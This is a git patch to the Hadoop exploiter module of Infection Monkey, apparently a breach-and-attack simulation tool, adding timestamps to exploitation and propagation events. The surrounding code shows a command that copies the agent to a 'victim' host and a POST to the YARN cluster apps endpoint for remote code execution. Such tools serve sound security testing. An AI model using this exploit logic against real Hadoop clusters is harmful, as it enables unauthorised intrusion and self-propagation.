From 76a3cb0ba0670bf8e0cd89c9825d47212b6d44bf Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 20:16:06 +0000 Subject: [PATCH] Agent: Stamp time before exploit executes --- monkey/infection_monkey/exploit/hadoop.py | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 4046a81b1..0a5b986a6 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -9,6 +9,7 @@ import logging import posixpath import random import string +from time import time from typing import Tuple import requests @@ -66,8 +67,9 @@ class HadoopExploiter(WebRCE): self.host, str(monkey_path_on_victim), self.agent_binary_repository ) + command = self._build_command(monkey_path_on_victim, http_path) + stamp = time() try: - command = self._build_command(monkey_path_on_victim, http_path) if self.exploit(self.vulnerable_urls[0], command): self.add_executed_cmd(command) @@ -76,8 +78,8 @@ class HadoopExploiter(WebRCE): except requests.RequestException as err: error_message = str(err) - self._publish_exploitation_event(False, error_message=error_message) - self._publish_propagation_event(False, error_message=error_message) + self._publish_exploitation_event(stamp, False, error_message=error_message) + self._publish_propagation_event(stamp, False, error_message=error_message) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() @@ -107,14 +109,15 @@ class HadoopExploiter(WebRCE): self._set_interrupted() return False + stamp = time() resp = requests.post( posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT ) success = resp.status_code == 202 message = "" if success else f"Failed to exploit via {url}" - self._publish_exploitation_event(success, error_message=message) - self._publish_propagation_event(success, error_message=message) + self._publish_exploitation_event(stamp, success, error_message=message) + self._publish_propagation_event(stamp, success, error_message=message) return success def check_if_exploitable(self, url):